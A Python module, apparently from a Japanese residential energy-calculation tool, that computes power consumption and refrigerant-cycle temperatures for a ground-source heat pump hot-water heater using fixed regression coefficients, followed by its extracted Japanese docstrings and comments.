Kcndh12:凝縮温度を計算する式の係数 (-) (5b) K_cnd_h_12 = get_K_cnd_h_12() # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (5a) Theta_ref_cnd_d_t = np.clip(K_cnd_h_0 + K_cnd_h_1 * Theta_SW_d_t + K_cnd_h_2 * qr_out_H_hs_d_t + K_cnd_h_12 * Theta_SW_d_t * qr_out_H_hs_d_t, None, 65) return Theta_ref_cnd_d_t def get_K_cnd_h_0(): """Kcndh0:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh0:凝縮温度を計算する式の係数 """ return 3.6105623002886 def get_K_cnd_h_1(): """Kcndh1:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: float: Kcndh1:凝縮温度を計算する式の係数 """ return 0.930136847064537 def get_K_cnd_h_2(): """Kcndh2:凝縮温度を計算する式の係数 (-) 
(5b) Args: Returns: float: Kcndh2:凝縮温度を計算する式の係数 """ return 0.494024927234563 def get_K_cnd_h_12(): """Kcndh12:凝縮温度を計算する式の係数 (-) (5b) Args: Returns: ndarray: Kcndh12:凝縮温度を計算する式の係数 """ return 0.00770898511188855 def calc_Theta_ref_SC_d_t(qr_out_H_hs_d_t, Theta_SW_d_t): """日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃)(6a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_SW_d_t(ndarray): 往き温水温度 (℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) """ # Ksch0:過冷却度を計算する式の係数 (-) (6b) K_sc_h_0 = get_K_sc_h_0() # Ksch1:過冷却度を計算する式の係数 (-) (6b) K_sc_h_1 = get_K_sc_h_1() # Ksch2:過冷却度を計算する式の係数 (-) (6b) K_sc_h_2 = get_K_sc_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの過冷却度(℃) (6a) Theta_ref_SC_d_t = np.clip(K_sc_h_0 + K_sc_h_1 * Theta_SW_d_t + K_sc_h_2 * qr_out_H_hs_d_t, 0, None) return Theta_ref_SC_d_t def get_K_sc_h_0(): """Ksch0:過冷却度を計算する式の係数(-) (6b) Args: Returns: float: Ksch0:過冷却度を計算する式の係数(-) (6b) """ return -4.02655782981397 def get_K_sc_h_1(): """Ksch1:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch1:過冷却度を計算する式の係数 """ return 0.0894330494418674 def get_K_sc_h_2(): """Ksch2:過冷却度を計算する式の係数 (-) (6b) Args: Returns: float: Ksch2:過冷却度を計算する式の係数 """ return 14.3457831669162 def calc_Theta_ref_SH_d_t(qr_out_H_hs_d_t, Theta_gsRW_d_ave_d): """日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃)(7a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: ndarray: 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) """ # Kshh0:過熱度を計算する式の係数 (-) (7b) K_sh_h_0 = get_K_sh_h_0() # Kshh1:過熱度を計算する式の係数 (-) (7b) K_sh_h_1 = get_K_sh_h_1() # Kshh2:過熱度を計算する式の係数 (-) (7b) K_sh_h_2 = get_K_sh_h_2() # 日付dの時刻tにおけるヒートポンプサイクルの過熱度(℃) (7a) Theta_ref_SC_d_t = np.clip(K_sh_h_0 + K_sh_h_1 * qr_out_H_hs_d_t + K_sh_h_2 * np.repeat(Theta_gsRW_d_ave_d, 24), 0, None) return Theta_ref_SC_d_t def get_K_sh_h_0(): """Kshh0:過熱度を計算する式の係数(-) (7b) Args: Returns: float: Kshh0:過熱度を計算する式の係数 """ return 0.819643791668597 def get_K_sh_h_1(): """Kshh1:過熱度を計算する式の係数 (-) (7b) Args: Returns: float: 
Kshh1:過熱度を計算する式の係数 (-) """ return 2.99282570323758 def get_K_sh_h_2(): """Kshh2:過熱度を計算する式の係数 (-) (7b) Args: Returns: Kshh2:過熱度を計算する式の係数 (-) """ return -0.0762659183765636 # ============================================================================ # N.5 ポンプの消費電力量 # ============================================================================ def get_E_pump_hs_d_t(E_pump_SW_d_t, E_pump_gsRW_d_t): """日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) Args: E_pump_SW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) E_pump_gsRW_d_t(ndarray): 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりのポンプの消費電力量(kWh/h) """ # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 (8) E_pump_hs_d_t = E_pump_SW_d_t + E_pump_gsRW_d_t return E_pump_hs_d_t def calc_E_pump_SW_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) """ # apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) a_pump_SW = get_a_pump_SW() # bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) b_pump_SW = get_b_pump_SW() # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量(kWh/h) (9a) E_pump_SW_d_t = a_pump_SW * qr_out_H_hs_d_t + b_pump_SW * (qr_out_H_hs_d_t ** 2) return E_pump_SW_d_t def get_a_pump_SW(): """apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: apump,SW:送水ポンプの消費電力量を計算する式の係数 (-) """ return 0.041972403 def get_b_pump_SW(): """bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) (9b) Args: Returns: float: bpump,SW:送水ポンプの消費電力量を計算する式の係数 (-) """ return 0.104478967 def calc_E_pump_gsRW_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) """ # apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) a_pump_gsRW = get_a_pump_gsRW() # bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) b_pump_gsRW = get_b_pump_gsRW() # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (10a) E_pump_gsRW_d_t = a_pump_gsRW * qr_out_H_hs_d_t + b_pump_gsRW * 
(qr_out_H_hs_d_t ** 2) return E_pump_gsRW_d_t def get_a_pump_gsRW(): """apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: float: apump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) """ return 0.062196275 def get_b_pump_gsRW(): """bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) (10b) Args: Returns: bpump,gsRW:熱源水ポンプの消費電力量を計算する式の係数 (-) """ return 0.071756474 # ============================================================================ # N.6 補機の消費電力量 # ============================================================================ def calc_E_aux_hs_d_t(qr_out_H_hs_d_t): """日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) """ # kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) kauxh0 = get_kauxh0() # kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) kauxh1 = get_kauxh1() # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量(kWh/h) (11a) E_aux_hs_d_t = kauxh1 * qr_out_H_hs_d_t + kauxh0 return E_aux_hs_d_t def get_kauxh0(): """kauxh0:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh0:補機の消費電力量を計算する式の係数 (-) """ return 0.0433205551083371 def get_kauxh1(): """kauxh1:補機の消費電力量を計算する式の係数 (-) (11b) Args: Returns: float: kauxh1:補機の消費電力量を計算する式の係数 (-) """ return 0.0173758330059922 # ============================================================================ # N.7 温水暖房用熱源機の最大暖房能力に対する平均負荷率 # ============================================================================ def get_qr_out_H_hs_d_t(q_out_H_hs_d_t, q_max_H_hs_JRA): """日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) Args: q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_max_H_hs_JRA(ndarray): 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) """ # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) qr_out_H_hs_d_t = (q_out_H_hs_d_t * 10 ** 3) / q_max_H_hs_JRA return qr_out_H_hs_d_t # ============================================================================ # N.8 温水暖房用熱源機の平均暖房出力 # 
============================================================================ def get_q_out_H_hs_d_t(Q_out_H_hs_d_t): """日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) Args: Q_out_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) """ # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(13) q_out_H_hs_d_t = Q_out_H_hs_d_t / 3600 * 10 ** 3 return q_out_H_hs_d_t def get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) Args: Q_dmd_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の温水熱需要(MJ/h) Q_max_H_hs_d_t(ndarray): 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h) """ # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW)(14) return np.min([Q_dmd_H_hs_d_t, Q_max_H_hs_d_t], axis=0) def calc_Q_max_H_hs_d_t(Theta_SW_d_t, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, q_max_hs, L_H_x_t_i, L_CS_x_t_i, L_CL_x_t_i, HeatExchangerType): """日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) (15) Args: Theta_SW_d_t(ndarray): 往き温水温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h) """ # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = get_L_max_C(L_CS_x_t_i, L_CL_x_t_i) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = get_L_max_H(L_H_x_t_i) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = get_R_L_max(L_max_H, L_max_C) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = calc_K_gsRW_H(R_L_max, HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) Theta_gsRW_d_ave_d = get_Theta_gsRW_d_ave_d(K_gsRW_H, 
Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) ---------- q_max_H_hs_JRA = calc_q_max_H_hs_JRA(q_max_hs) # ---------- 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) ---------- Q_max_H_hs_d_t = (-0.005635139785329 * Theta_SW_d_t + 0.0258983299329793 * np.clip(np.repeat(Theta_gsRW_d_ave_d, 24), 0, 20) + 0.836930642418471) * q_max_H_hs_JRA * 3600 * 10 ** (-6) return Q_max_H_hs_d_t # ============================================================================ # N.9 温水暖房用熱源機内の平均放熱損失 # ============================================================================ def get_q_loss_H_hs_d_t(): """日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) Args: Returns: float: 日付dの時刻tにおける温水暖房用熱源機内の平均放熱損失(kW) """ return 0 # ============================================================================ # N.10 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 # ============================================================================ def calc_q_max_H_hs_JRA(q_max_hs): """地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) (16) Args: q_max_hs(return: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)): 熱源機の最大暖房能力 ⒲ Returns: 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W) """ # 地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) f_crated = get_f_crated() # 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力(W)(16) q_max_H_hs_JRA = q_max_hs * f_crated return q_max_H_hs_JRA def calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh): """温水暖房用熱源機の定格能力 Args: region(int): 省エネルギー地域区分 A_A(float): 床面積の合計 (m2) A_MR(float): 主たる居室の床面積 (m2) A_OR(float): その他の居室の床面積 (m2) mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は' mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は' has_MR_hwh(bool): 温水暖房の放熱器を主たる居室に設置する場合はTrue has_OR_hwh(bool): 温水暖房の放熱器をその他の居室に設置する場合はTrue Returns: float: 温水暖房用熱源機の定格能力 """ # 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい return appendix_H.calc_q_max_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh) def get_f_crated(): """地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) Args: Returns: float: 
地中からの戻り熱源水温度および送水温度に関する最大暖房能力の補正係数(-) """ return 1.35 # ============================================================================ # N.11 地中熱交換器からの戻り熱源水の日平均温度 # ============================================================================ def get_Theta_gsRW_d_ave_d(K_gsRW_H, Theta_ex_d_Ave_d, Theta_ex_H_Ave, Theta_ex_a_Ave, Delta_Theta_gsRW_H): """日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) Args: K_gsRW_H(float): K_gsRW_H: 地中熱交換器からの戻り熱源水温度を求める式の係数(-) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Delta_Theta_gsRW_H(float): 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) Returns: ndarray: 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) """ # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) (17) Theta_gsRW_d_ave_d = K_gsRW_H * (Theta_ex_d_Ave_d - Theta_ex_H_Ave) + Theta_ex_a_Ave + Delta_Theta_gsRW_H return Theta_gsRW_d_ave_d def calc_Delta_Theta_gsRW_H(R_L_max, HeatExchangerType): """暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 地中熱交換器タイプ Returns: float: 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃) """ # 熱交換器タイプに応じた係数取得 a_gsRW_H = get_a_gsRW_H(HeatExchangerType) b_gsRW_H = get_b_gsRW_H(HeatExchangerType) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) Delta_Theta_gsRW_H = a_gsRW_H * R_L_max + b_gsRW_H return Delta_Theta_gsRW_H def calc_K_gsRW_H(R_L_max, HeatExchangerType): """地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) Args: R_L_max(float): 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-) HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) """ # 熱交換器タイプに応じた係数取得 c_gsRW_H = get_c_gsRW_H(HeatExchangerType) d_gsRW_H = get_d_gsRW_H(HeatExchangerType) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) K_gsRW_H = c_gsRW_H * R_L_max + d_gsRW_H return K_gsRW_H def get_a_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 """ if HeatExchangerType == '1': return 
get_table_n_3()[0][0] elif HeatExchangerType == '2': return get_table_n_3()[1][0] elif HeatExchangerType == '3': return get_table_n_3()[2][0] elif HeatExchangerType == '4': return get_table_n_3()[3][0] elif HeatExchangerType == '5': return get_table_n_3()[4][0] else: raise ValueError(HeatExchangerType) def get_b_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][1] elif HeatExchangerType == '2': return get_table_n_3()[1][1] elif HeatExchangerType == '3': return get_table_n_3()[2][1] elif HeatExchangerType == '4': return get_table_n_3()[3][1] elif HeatExchangerType == '5': return get_table_n_3()[4][1] else: raise ValueError(HeatExchangerType) def get_c_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数a_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数a_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][2] elif HeatExchangerType == '2': return get_table_n_3()[1][2] elif HeatExchangerType == '3': return get_table_n_3()[2][2] elif HeatExchangerType == '4': return get_table_n_3()[3][2] elif HeatExchangerType == '5': return get_table_n_3()[4][2] else: raise ValueError(HeatExchangerType) def get_d_gsRW_H(HeatExchangerType): """熱交換器タイプに応じた係数b_gsRW_Hの取得 Args: HeatExchangerType(str): 熱交換器タイプ (-) Returns: float: 熱交換器タイプに応じた係数b_gsRW_Hの取得 """ if HeatExchangerType == '1': return get_table_n_3()[0][3] elif HeatExchangerType == '2': return get_table_n_3()[1][3] elif HeatExchangerType == '3': return get_table_n_3()[2][3] elif HeatExchangerType == '4': return get_table_n_3()[3][3] elif HeatExchangerType == '5': return get_table_n_3()[4][3] else: raise ValueError(HeatExchangerType) def get_table_n_3(): """表N.3 係数 Args: Returns: list: 表N.3 係数 """ table_n_3 = [ (3.1672, -0.4273, -0.0444, 0.0442), (5.9793, -1.0687, -0.1613, 0.1047), (8.3652, -1.5946, -0.2486, 0.1546), (9.9065, -2.1827, -0.3454, 
0.2072), (10.2898, -2.8727, -0.3270, 0.2700) ] return table_n_3 def get_R_L_max(L_max_H, L_max_C): """1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) Args: L_max_H(float): 1日当たりの暖房負荷の年間最大値(MJ/d) L_max_C(float): 1日当たりの冷房全熱負荷の年間最大値(MJ/d) Returns: float: 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) """ # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) R_L_max = (L_max_C - L_max_H) / (L_max_C + L_max_H) return R_L_max def get_L_max_H(L_H_x_t_i): """1日当たりの暖房負荷の年間最大値(MJ/d)(20b) Args: L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 Returns: float: 1日当たりの暖房負荷の年間最大値(MJ/d) """ # L_H_x_t_iは暖冷房区画毎に365日×24時間分の負荷を持った2次元配列 # 暖冷房区画軸合算(暖冷房区画の次元をなくす) L_H_x_t = np.sum(L_H_x_t_i, axis=0) # 1次元配列を2次元配列に形状変換する L_H_x_t = np.reshape(L_H_x_t, (365, 24)) # 時間軸合算 L_H_x = np.sum(L_H_x_t, axis=1) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) L_max_H = np.max(L_H_x) return L_max_H def get_L_max_C(L_CS_x_t_i, L_CL_x_t_i): """1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) Args: L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) Returns: float: 1日当たりの冷房全熱負荷の年間最大値(MJ/d) """ # 暖冷房区画軸合算(暖冷房区画の次元をなくす) L_CS_x_t = np.sum(L_CS_x_t_i, axis=0) L_CL_x_t = np.sum(L_CL_x_t_i, axis=0) # L_CS_x_tとL_CL_x_tの要素同士を足す L_C_x_t = L_CS_x_t + L_CL_x_t # 1次元配列を2次元配列に形状変換する L_C_x_t = np.reshape(L_C_x_t, (365, 24)) # 時間軸合算 L_C_x = np.sum(L_C_x_t, axis=1) # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) L_max_C = np.max(L_C_x) return L_max_C
ja
0.920386
# ============================================================================ # 付録 N 地中熱ヒートポンプ温水暖房機 # ============================================================================ # ============================================================================ # N3. 暖房エネルギー消費量 # ============================================================================ # ============================================================================ # N.3.1 消費電力量 # ============================================================================ 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の消費電力量 (1) Args: Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h) Theta_ex_a_Ave(float): 年平均外気温度 (℃) Theta_ex_d_Ave_d(ndarray): 日付dにおける日平均外気温度 (℃) Theta_ex_H_Ave(float): 暖房期における期間平均外気温度(℃) Theta_SW_d_t(ndarray): 往き温水温度 (℃) q_max_hs(float): 熱源機の最大暖房能力 ⒲ L_H_x_t_i(ndarray): 暖冷房区画iの1時間当たりの暖房負荷 L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h) L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h) HeatExchangerType(str): 熱交換器タイプ (-) Returns: ndarray: 1時間当たりの熱源機の消費電力量 (kWh/h) # ---------- 地中熱交換器からの戻り熱源水の日平均温度 ---------- # 1日当たりの冷房全熱負荷の年間最大値(MJ/d)(20c) # 1日当たりの暖房負荷の年間最大値(MJ/d)(20b) # 1日当たりの暖房負荷の年間最大値と1日当たりの冷房負荷の年間最大値の和に対する、これらの差の比(-)(20a) # 地中熱交換器からの戻り熱源水温度を求める式の係数(-)(19) # 暖房期における地中熱交換器からの戻り熱源水の期間平均温度と年平均外気温度との差(℃)(18) # 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃)(17) # ---------- 地中からの戻り熱源水温度および送水温度による補正後の最大暖房能力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(16) # ---------- 温水暖房用熱源機内の平均放熱損失 ---------- # 日付dの時刻tにおける温水暖房用の熱源機内部の平均放熱損失 (kw) (N.9) # ---------- 温水暖房用熱源機の平均暖房出力 ---------- # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の最大暖房出力(MJ/h)(15) # 日付dの時刻tにおける1時間当たりの温水暖房用熱源機の暖房出力(MJ/h)(14) # 日付dの時刻tにおける温水暖房用熱源機の平均暖房出力(kW) (13) # ---------- 温水暖房用熱源機の最大暖房能力に対する平均負荷率 ---------- # 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) (12) # ---------- 補機の消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの補機の消費電力量(kWh/h) (11a) # ---------- ポンプの消費電力量 ---------- # 日付dの時刻tにおける1時間当たりの熱源水ポンプの消費電力量 (kWh/h) (10a) # 日付dの時刻tにおける1時間当たりの送水ポンプの消費電力量 (kWh/h) (9a) # 日付dの時刻tにおける1時間当たりのポンプの消費電力量 
(kWh/h) (8) # ---------- 圧縮機の消費電力量 ---------- # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(7a) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(6a) # 日付dの時刻tにおけるヒートポンプサイクルの凝縮温度(℃)(5a) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃)(4a) # 日付dの時刻tにおける1時間当たりの圧縮機の圧縮効率 (-) (3a) # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (kWh/h) (2) # ---------- 熱源機の消費電力量 ---------- # 1時間当たりの熱源機の消費電力量 (kWh/h) (1) # ============================================================================ # N.3.2 ガス消費量 # ============================================================================ 熱源機のガス消費量 Args: Returns: ndarray: 熱源機のガス消費量 # ============================================================================ # N.3.3 灯油消費量 # ============================================================================ 熱源機の灯油消費量 Args: Returns: ndarray: 熱源機の灯油消費量 # ============================================================================ # N.3.4 その他の一次エネルギー消費量 # ============================================================================ 熱源機のその他の燃料の一次エネルギー消費量 Args: Returns: ndarray: 熱源機のその他の燃料の一次エネルギー消費量 # ============================================================================ # N.4 圧縮機の消費電力量 # ============================================================================ 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) q_out_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 q_loss_H_hs_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Mu_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Returns: ndarray: 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 # 圧縮機の消費電力に対する補正係数を計算する式の係数(-) (2c) # 日付𝑑の時刻𝑡における圧縮機の消費電力に対する補正係数(-) (2b) # 日付dの時刻tにおける1時間当たりの圧縮機の消費電力量 (2a) 日付dの時刻tにおける圧縮機の圧縮効率 (3a) Args: Theta_ref_evp_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_cnd_d_t(ndarray): 1時間平均のヒートポンプユニットの断続運転率 Theta_ref_SC_d_t(ndarray): ヒートポンプサイクルの過冷却度(℃) Theta_ref_SH_d_t(ndarray): ヒートポンプサイクルの過熱度(℃) Returns: ndarray: 日付dの時刻tにおける圧縮機の圧縮効率 (3a) # Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) # 
Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) # Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) # 日付dの時刻tにおけるヒートポンプサイクルの理論暖房効率(-) 4章8節付録A(1) # 日付dの時刻tにおける圧縮機の圧縮効率 (3a) Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh0:圧縮機の圧縮効率を求める式の係数 (-) (3b) Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh1:圧縮機の圧縮効率を求める式の係数 (-) (3b) Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) Args: Returns: float: Kμh2:圧縮機の圧縮効率を求める式の係数 (-) (3b) 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Args: qr_out_H_hs_d_t(ndarray): 日付dの時刻tにおける温水暖房用熱源機の最大暖房能力に対する平均負荷率(-) Theta_gsRW_d_ave_d(ndarray): 日付dにおける地中熱交換器からの戻り熱源水の日平均温度(℃) Returns: 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) # Kevph0:蒸発温度を計算する式の係数 (-) (4b) # Kevph1:蒸発温度を計算する式の係数 (-) (4b) # Kevph2:蒸発温度を計算する式の係数 (-) (4b) # Kevph12:蒸発温度を計算する式の係数 (-) (4b) # 日付dの時刻tにおけるヒートポンプサイクルの蒸発温度(℃) (4a) Kevph0:蒸発温度を計算する式の係数 (-) (4b) Args: Returns: float: Kevph0:蒸発温度を計算する式の係数 Kevph1:蒸発温度を計算する式の係数 